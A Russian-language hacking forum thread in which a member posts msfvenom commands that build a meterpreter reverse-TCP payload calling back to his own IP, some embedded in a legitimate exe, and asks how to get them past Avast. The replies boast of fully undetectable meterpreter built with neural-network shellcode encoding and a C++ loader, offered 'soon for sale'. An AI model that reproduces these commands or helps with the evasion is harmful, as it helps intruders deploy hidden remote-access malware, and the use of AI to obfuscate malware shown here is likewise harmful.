• Новый бот-ассистент на форуме Codeby

    Теперь на форуме работает ИИ-помощник @bot_cdb — твой технический ассистент по информационной безопасности. Просто упомяни @bot_cdb в любой теме, и получишь быстрый ответ на вопросы по CVE, инструментам, техникам атак и защиты. Бот анализирует весь тред перед ответом, проверяет актуальность данных и может предложить дополнительную помощь. Особенно полезен для проверки технических деталей, поиска документации и быстрых консультаций по пентесту, малвари, форензике и другим областям ИБ.

MSFVENOM - Как обойти антивирус?

Iridium2020

Member
13.11.2019
11
0
Все привет!. Недавно начал изучать metasploit и msfvenom на kali linux. В msfvenom практиковал с пейлодом (windows/x64/meterpreter_reverse_tcp). Применял разные виды шифрование (-e x64/xor, и другие x64 виды шифрования.) Ставил разные значения итеррации -i от 10 до 1000). Применял -b '\x00'. Отнюдь антивирус аваст мой все эти пейлоды в формате еxe блокирует напрочь. Без антивируса пейлод в процессах висит и могу подключаться внутри сети c другого компа. Встраивал пейлод в екзешные программы - Антивирус не блокирует)))) но программа вылетает.
Посоветуйте как можно преодалеть антивирус. Может чем то дополнить нужно параметры при создании пэйлода. Читал что антивирусы делают анализы по шаблонам которые внесены в их базе.
И еще помогите советом как можно преодолеть вылет программы езешной в которой встроен пейлод.
пейлод создавал таким образом
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=Мой IP LPORT=4444 -f exe -e x64/xor -i 50 --arch x64 --platform windows -o /root/Mypayload.exe

и вот так с какой либо экзешной программой
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST="Мой IP" LPORT=4444 -x /root/programma.exe -f exe -e x64/xor -i 50 --arch x64 --platform windows -o /root/Mypayload.exe
Заранее всем большое спасибо
 
Обрати внимание на этот
github
 
уже, не те времена)) нашел 2ва, способа обхода, один простой как 2ве копейки, а второй пришлось кодировать Shellcode с помощью нейросети) и вставлять в активатор на С++
)
Screenshot_1.png


30 минут и фудец)

`FUD meterpreter` скоро в продаже сама нейро-сеть и ее продукция)
 
Последнее редактирование:
уже, не те времена)) нашел 2ва, способа обхода, один простой как 2ве копейки, а второй пришлось кодировать Shellcode с помощью нейросети) и вставлять в активатор на С++
)
Посмотреть вложение 42602

30 минут и фудец)

`FUD meterpreter` скоро в продаже сама нейро-сеть и ее продукция)
hoodoer/ENNEoS ты про это, + создание лоадера на С++?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab